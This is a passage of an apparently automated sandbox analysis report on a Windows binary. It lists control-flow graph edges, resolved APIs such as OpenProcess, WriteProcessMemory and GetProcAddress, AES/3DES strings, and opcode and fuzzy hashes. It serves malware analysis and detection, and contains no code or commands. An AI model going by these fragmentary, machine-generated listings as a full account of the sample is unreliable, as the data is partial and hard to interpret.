82 7ff609751b68 77->82 83 7ff609751bd1-7ff609751bd3 77->83 79->67 80->68 87 7ff609751a2e-7ff609751a3d 80->87 89 7ff609751b6c-7ff609751b6e 82->89 83->68 91 7ff609751d1e-7ff609751d21 85->91 93 7ff609751a44-7ff609751a46 87->93 89->83 90 7ff609751b70-7ff609751b8f 89->90 96 7ff609751bc5-7ff609751bcf 90->96 97 7ff609751b91-7ff609751bc3 call 7ff609754104 RtlInitUnicodeString call 7ff609751f84 90->97 98 7ff609751d27-7ff609751d2c 91->98 99 7ff609751c43-7ff609751c45 91->99 93->68 100 7ff609751a4c-7ff609751a70 93->100 95 7ff609751f5e-7ff609751f69 94->95 104 7ff609751f6b 95->104 105 7ff609751f13-7ff609751f15 95->105 96->83 96->89 97->96 98->68 103 7ff609751d32-7ff609751d40 call 7ff60975214c 98->103 99->98 102 7ff609751c4b-7ff609751c72 call 7ff609751170 99->102 107 7ff609751a76-7ff609751a90 100->107 108 7ff609751b21-7ff609751b2f 100->108 125 7ff609751d16-7ff609751d1a 102->125 126 7ff609751c78-7ff609751ccb GetModuleHandleW GetProcAddress 102->126 121 7ff609751d45-7ff609751d47 103->121 104->68 105->104 109 7ff609751f17-7ff609751f5a call 7ff609751f84 105->109 114 7ff609751a92-7ff609751ac4 GetModuleHandleW GetProcAddress 107->114 115 7ff609751ae5-7ff609751ae8 107->115 108->93 113 7ff609751b35 108->113 109->95 113->68 114->115 128 7ff609751ac6-7ff609751ad2 114->128 119 7ff609751b1a 115->119 120 7ff609751aea-7ff609751b14 RtlInitUnicodeString LocalFree 115->120 119->108 120->119 121->68 127 7ff609751d4d-7ff609751d7b call 7ff609751170 121->127 125->91 126->125 136 7ff609751ccd-7ff609751cf2 call 7ff609751170 126->136 127->68 137 7ff609751d81-7ff609751d90 127->137 128->115 131 7ff609751ad4-7ff609751ae3 128->131 131->115 131->131 143 7ff609751d0b-7ff609751d10 LocalFree 136->143 144 7ff609751cf4-7ff609751cf9 call 7ff609751f84 136->144 139 7ff609751e6a-7ff609751e6d 137->139 141 7ff609751e73 139->141 142 7ff609751d95-7ff609751d97 139->142 141->104 142->104 145 7ff609751d9d-7ff609751dc2 call 7ff609751170 142->145 143->125 148 7ff609751cfe-7ff609751d09 144->148 150 7ff609751dc8-7ff609751e19 GetModuleHandleW GetProcAddress 145->150 151 7ff609751e63-7ff609751e66 145->151 148->143 150->151 154 7ff609751e1b-7ff609751e3f call 7ff609751170 150->154 151->139 157 7ff609751e58-7ff609751e5d LocalFree 154->157 158 7ff609751e41-7ff609751e56 call 7ff609751f84 154->158 157->151 158->157
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: InitStringUnicode$AddressFreeHandleLocalModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 979628613-3502785670
                                              • Opcode ID: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                              • Instruction ID: f39eff5335bf9f7618a7d1155d4fdb7f2e94603a3d2cf310d540549a0689d8a1
                                              • Opcode Fuzzy Hash: 0851a3e972158747da21b2bd7a9b9ad4a38fb3e2a2c883383aee178a5001d619
                                              • Instruction Fuzzy Hash: C5023137A19B8286DBA0CF65E44076E73A2FB84795F900135EA5D87B98EF7CE544C700
                                              Function 00007FF609752CE8 Relevance: 22.8, APIs: 5, Strings: 8, Instructions: 84libraryloadermemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$AllocLocal
                                              • String ID: 3DES$AES$ChainingMode$ChainingModeCBC$ChainingModeCFB$LocalAlloc$ObjectLength$kernel32
                                              • API String ID: 1838034928-1761306045
                                              • Opcode ID: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                              • Instruction ID: b94dd1e43415301367f6daee4fd66d24aabf17ff5126d7f4d46c11b2b75f86fb
                                              • Opcode Fuzzy Hash: 5bcc1f89c5a41f3fdbcdbe6b7af9a21048179cca6ad5a353acb6baa70339d064
                                              • Instruction Fuzzy Hash: 8741ED62A19B4382FB808F16F85867527A2BB89BD8F600131CA0DC7764EFBDE549C704
                                              Function 00007FF6097536D8 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 222libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 177 7ff6097536d8-7ff60975371d call 7ff60975326c 179 7ff609753722-7ff60975372a 177->179 180 7ff609753a63-7ff609753a7c 179->180 181 7ff609753730-7ff609753751 179->181 182 7ff60975375c-7ff609753761 181->182 183 7ff609753753-7ff60975375a 181->183 185 7ff60975376c-7ff609753771 182->185 186 7ff609753763-7ff60975376a 182->186 184 7ff6097537a3-7ff6097537ad 183->184 189 7ff6097537bf-7ff6097537da 184->189 190 7ff6097537af-7ff6097537b9 184->190 187 7ff60975377c-7ff609753781 185->187 188 7ff609753773-7ff60975377a 185->188 186->184 194 7ff60975378c-7ff60975379f 187->194 195 7ff609753783-7ff60975378a 187->195 188->184 192 7ff6097537dc-7ff6097537ec call 7ff609751170 189->192 193 7ff6097537f1-7ff6097537f6 189->193 190->189 191 7ff6097537bb 190->191 191->189 192->193 193->180 197 7ff6097537fc 193->197 194->184 195->184 198 7ff609753803-7ff609753851 GetModuleHandleW GetProcAddress 197->198 200 7ff609753857-7ff60975386e call 7ff609751170 198->200 201 7ff609753a54-7ff609753a59 198->201 205 7ff609753a4a-7ff609753a4e LocalFree 200->205 206 7ff609753874-7ff609753882 200->206 201->198 203 7ff609753a5f 201->203 203->180 205->201 207 7ff609753a3a-7ff609753a44 206->207 207->205 208 7ff609753887-7ff609753889 207->208 208->205 209 7ff60975388f-7ff6097538a2 call 7ff609751170 208->209 209->205 212 7ff6097538a8-7ff609753989 call 7ff60975224c * 3 call 7ff609751170 209->212 221 7ff60975398b-7ff6097539c7 GetModuleHandleW GetProcAddress 212->221 222 7ff6097539dd-7ff6097539f6 call 7ff609753ae8 212->222 221->222 228 7ff6097539c9-7ff6097539d8 call 7ff609751170 221->228 226 7ff6097539f8 LocalFree 222->226 227 7ff6097539fe-7ff609753a09 222->227 226->227 229 7ff609753a0b LocalFree 227->229 230 7ff609753a11-7ff609753a1c 227->230 228->222 229->230 232 7ff609753a24-7ff609753a2b 230->232 233 7ff609753a1e LocalFree 230->233 234 7ff609753a2d LocalFree 232->234 235 7ff609753a33-7ff609753a37 232->235 233->232 234->235 235->207
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLocalModuleProc$File$Pointer$CreateMemoryProcessWrite
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 2588141871-3502785670
                                              • Opcode ID: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                              • Instruction ID: b6c41c4d822af9e486b7f3056fc1567b12dd6c6df01ed572b340675b0fc7c30c
                                              • Opcode Fuzzy Hash: 80145aa57d431d5147bb43df575b077b9336c1a2266df3ced7f7cf172c5d0ce3
                                              • Instruction Fuzzy Hash: 5EB1FB77B09B06CAEB90CF65E4902AC33A6EB487C8F640135EA4D83768EF78E555C740
                                              Function 00007FF609752348 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 70memorysleepfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DescriptorHeapSecurity$AddressAllocCreateDaclFileHandleInitializeModuleNamedPipeProcProcessSleepWait
                                              • String ID: GetLastError$kernel32
                                              • API String ID: 2144717574-498319287
                                              • Opcode ID: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                              • Instruction ID: dbae78f05a452f3702f03d4435c4eb36b227fedfa8aac8d9448a1a315c1bab00
                                              • Opcode Fuzzy Hash: 4ab51b74eecba5ece5bb2e860a51bc6d2ff0e4a8fc15db7d61da1898b13bac78
                                              • Instruction Fuzzy Hash: 3A318133A18A4283EB948F25E44433973A1FB84BE4F644334D66D877A4EFBCD8498740
                                              Function 00007FF609751F84 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 92libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FreeLocal$FilePointer$MemoryProcessWrite
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3806729184-3502785670
                                              • Opcode ID: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                              • Instruction ID: 0713aea3f0da0776567d400045c7063f3032079e556a05100cef46a91e06ba6e
                                              • Opcode Fuzzy Hash: 715e26d59b103649faca0eeeb921ea06f3607703f71d2b78899444f4b38fef8e
                                              • Instruction Fuzzy Hash: BE412A33B15B069AEB90DF61E4402AC7376FB44B88B544535CE0D93B59EF78EA59C380
                                              Function 00007FF6097543C4 Relevance: 15.1, APIs: 10, Instructions: 87COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _amsg_exit$CommandInitializeLine__wsetargv_cinit
                                              • String ID:
                                              • API String ID: 2949660345-0
                                              • Opcode ID: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                              • Instruction ID: f46cfaf6ff9295d62838567b60e42b7624ea98c0676d7a0dfadf1f4379df6123
                                              • Opcode Fuzzy Hash: 4a7d6e35ace3f62a0085c96bf3ee593ae1479313b33e2137b40653fb956c2ead
                                              • Instruction Fuzzy Hash: 12311E63E4C64786FAD07FA0A4552BA22A7AF403C4F744139E55DC63E7EEECB8808651
                                              Function 00007FF60975326C Relevance: 13.7, APIs: 9, Instructions: 220fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 333 7ff60975326c-7ff6097532ce 334 7ff6097535eb-7ff6097535fe 333->334 335 7ff6097532d4-7ff6097532e7 call 7ff609752a34 333->335 335->334 337 7ff6097532ed-7ff6097532f7 335->337 338 7ff6097532f9-7ff609753320 CreateFileW 337->338 339 7ff609753325-7ff609753359 RtlInitUnicodeString call 7ff609751864 337->339 340 7ff6097533ac-7ff6097533b2 338->340 344 7ff60975335e-7ff609753360 339->344 342 7ff609753578 340->342 343 7ff6097533b8-7ff6097533bc 340->343 345 7ff60975357f-7ff609753582 342->345 343->342 346 7ff6097533c2-7ff6097533d9 call 7ff609751000 343->346 344->342 347 7ff609753366-7ff609753370 344->347 348 7ff6097535d8-7ff6097535e8 FindCloseChangeNotification 345->348 349 7ff609753584-7ff609753588 345->349 346->342 359 7ff6097533df-7ff6097533ea 346->359 351 7ff60975337e-7ff609753389 call 7ff609751920 347->351 348->334 353 7ff60975358a-7ff60975358c 349->353 354 7ff6097535c2-7ff6097535c6 LocalFree 349->354 361 7ff60975338b-7ff609753397 LocalFree 351->361 362 7ff609753372-7ff609753374 351->362 357 7ff609753599-7ff6097535a0 353->357 358 7ff60975358e-7ff609753590 353->358 360 7ff6097535cc-7ff6097535d5 LocalFree 354->360 357->360 364 7ff6097535a2-7ff6097535ac 357->364 358->354 363 7ff609753592-7ff609753595 358->363 365 7ff6097533ec-7ff609753400 call 7ff609751624 359->365 366 7ff609753463-7ff609753482 359->366 360->348 361->342 367 7ff60975339d-7ff6097533a6 OpenProcess 361->367 362->361 373 7ff609753376-7ff60975337b 362->373 363->360 369 7ff609753597 363->369 370 7ff6097535b4-7ff6097535b7 364->370 371 7ff6097535ae UnmapViewOfFile 364->371 379 7ff609753448-7ff609753461 365->379 380 7ff609753402-7ff609753429 365->380 368 7ff609753489-7ff60975348c 366->368 367->340 368->345 374 7ff609753492-7ff6097534a7 368->374 369->354 370->354 375 7ff6097535b9-7ff6097535bc CloseHandle 370->375 371->370 373->351 377 7ff6097534a9-7ff6097534b2 374->377 378 7ff6097534b4 374->378 375->354 377->378 381 7ff6097534be-7ff6097534d2 call 7ff60975196c 377->381 378->381 379->368 382 7ff60975342b-7ff60975342f 380->382 383 7ff60975343e-7ff609753446 380->383 381->342 387 7ff6097534d8-7ff6097534de 381->387 382->345 385 7ff609753435-7ff609753438 382->385 383->368 385->345 385->383 387->342 388 7ff6097534e4-7ff609753552 call 7ff609753da8 387->388 390 7ff609753557-7ff609753559 388->390 390->342 391 7ff60975355b-7ff609753576 390->391 391->334 391->342
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: FreeLocal$CloseFile$ChangeCreateFindHandleInitNotificationOpenProcessStringUnicodeUnmapView
                                              • String ID:
                                              • API String ID: 34978191-0
                                              • Opcode ID: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                              • Instruction ID: 6bdfb8d8889e0711da4a0c4038452feec6e9a81b1bd772eb9eec7611d69c8386
                                              • Opcode Fuzzy Hash: cc8829089956d63626426c18dc2d50d9a0f7f225df45c6989eba5b351c94c693
                                              • Instruction Fuzzy Hash: 52A10673A09643CAFB958F22E84067937A2BB847D8F645139D90D87BA4DFBCE945C700
                                              Function 00007FF6097566BC Relevance: 10.7, APIs: 7, Instructions: 184COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 394 7ff6097566bc-7ff6097566fb GetStartupInfoW call 7ff609757520 397 7ff6097566fd-7ff609756700 394->397 398 7ff609756705-7ff60975671d 394->398 399 7ff609756970-7ff60975698d 397->399 400 7ff609756764-7ff60975676a 398->400 401 7ff60975671f 398->401 403 7ff6097568a4-7ff6097568a7 400->403 404 7ff609756770-7ff609756778 400->404 402 7ff609756723-7ff60975675c 401->402 402->402 405 7ff60975675e 402->405 407 7ff6097568aa-7ff6097568b6 403->407 404->403 406 7ff60975677e-7ff609756794 404->406 405->400 410 7ff60975679a 406->410 411 7ff609756821-7ff609756826 406->411 408 7ff6097568b8-7ff6097568bd 407->408 409 7ff6097568c9-7ff6097568f2 GetStdHandle 407->409 408->409 412 7ff6097568bf-7ff6097568c4 408->412 413 7ff6097568f4-7ff6097568f7 409->413 414 7ff609756941-7ff609756946 409->414 416 7ff6097567a1-7ff6097567b1 call 7ff609757520 410->416 411->403 415 7ff609756828-7ff60975682d 411->415 417 7ff60975694e-7ff60975695c 412->417 413->414 418 7ff6097568f9-7ff609756904 GetFileType 413->418 414->417 419 7ff609756897-7ff6097568a2 415->419 420 7ff60975682f-7ff609756834 415->420 429 7ff60975681b 416->429 430 7ff6097567b3-7ff6097567ce 416->430 417->407 424 7ff609756962-7ff60975696e SetHandleCount 417->424 418->414 422 7ff609756906-7ff609756910 418->422 419->403 419->415 420->419 423 7ff609756836-7ff60975683b 420->423 426 7ff609756919-7ff60975691c 422->426 427 7ff609756912-7ff609756917 422->427 423->419 428 7ff60975683d-7ff609756842 423->428 424->399 431 7ff609756923-7ff609756935 InitializeCriticalSectionAndSpinCount 426->431 432 7ff60975691e 426->432 427->431 433 7ff609756852-7ff60975688e InitializeCriticalSectionAndSpinCount 428->433 434 7ff609756844-7ff609756850 GetFileType 428->434 429->411 435 7ff6097567d0 430->435 436 7ff609756811-7ff609756817 430->436 431->397 439 7ff60975693b-7ff60975693f 431->439 432->431 433->397 440 7ff609756894 433->440 434->419 434->433 437 7ff6097567d4-7ff609756809 435->437 436->416 438 7ff609756819 436->438 437->437 441 7ff60975680b 437->441 438->411 439->417 440->419 441->436
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
                                              • String ID:
                                              • API String ID: 3473179607-0
                                              • Opcode ID: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                              • Instruction ID: bc44e6e9dfba0fe1f46c56ba4be2528f1d90f5abc12b51f41105634ae6852942
                                              • Opcode Fuzzy Hash: 23fc88ee8adbd0c7eaf4c27518cee885393d252e9a1d10b55ff3b23b75bf4fba
                                              • Instruction Fuzzy Hash: 0B814163A09B8286EB948F15D44432967A2FB447B8F644339CA7D823E5DF7CE455C304
                                              Function 00007FF609751380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128librarymemoryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Local$AddressAllocFreeHandleModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3402345641-3502785670
                                              • Opcode ID: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
                                              • Instruction ID: d2e4ad0c347e9173f257a66cf1c0a83c79ff373bb9d02e773dd4922046b7527a
                                              • Opcode Fuzzy Hash: eb57376ed0b4afeca1e5142186e1efa77bb62efc8010bcbc3caba3e012b0defc
                                              • Instruction Fuzzy Hash: FE515C33B18A5685EF90CF66E8501AD23B6FB48BC9B684136DE4E93B58DF7CD8418340
                                              Function 00007FF6097559E4 Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • _lock.LIBCMT ref: 00007FF609755A0D
                                                • Part of subcall function 00007FF60975741C: _amsg_exit.LIBCMT ref: 00007FF609757446
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755A40
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755A5E
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755A9E
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755AB8
                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF609755BD1,?,?,00000000,00007FF60975744B), ref: 00007FF609755AC8
                                              • ExitProcess.KERNEL32 ref: 00007FF609755B54
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DecodePointer$ExitProcess_amsg_exit_lock
                                              • String ID:
                                              • API String ID: 3411037476-0
                                              • Opcode ID: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
                                              • Instruction ID: 159491123e95916680a1818eb5927921327968472964221ca9e93a3f08c9c350
                                              • Opcode Fuzzy Hash: 2ca9a3cf637af8fc47ae09c3887ccdeb15420f15214857e012c7e6f36fb62fdc
                                              • Instruction Fuzzy Hash: BE416C23A1AA4385F684AF11EC8113967A6FF887D4F240135EA4EC77A5EFBCE491C700
                                              Function 00007FF60975245C Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: DescriptorHandleHeapSecurity$AddressAdjustAllocCloseCreateDaclFileInitializeModuleNumbersPrivilegeProcProcessSleepVersion
                                              • String ID:
                                              • API String ID: 366963940-0
                                              • Opcode ID: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                              • Instruction ID: ce9513c9a33845d0357c402f76e2176e5804b14d37955e5d62912a382107d936
                                              • Opcode Fuzzy Hash: 5f5447fcf68489846dc299bc371346d0ad4ccce6d3d7bd68e5f5ed360826dd67
                                              • Instruction Fuzzy Hash: 81111633A09A0392EB909F11E8551B83362FF447D4FA40236D56DC67A1DFBCE549CB40
                                              Function 00007FF609756A00 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: Heap$CreateInformationVersion
                                              • String ID:
                                              • API String ID: 3563531100-0
                                              • Opcode ID: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                              • Instruction ID: a75e98fda5cc269f824f510d6e73bb0fe2b6a4f71ad7d14fb1a900504389ac5a
                                              • Opcode Fuzzy Hash: 196e626f87aaeb48684bc97888c59a56b1a0abfcc28fc9b23060c14a5b268ca3
                                              • Instruction Fuzzy Hash: B5E06536A1974242FBC86F10A81A7753252BF843C1FA05134D54E82754EFBCD045C600

                                              Non-executed Functions

                                              Function 00007FF609755C00 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
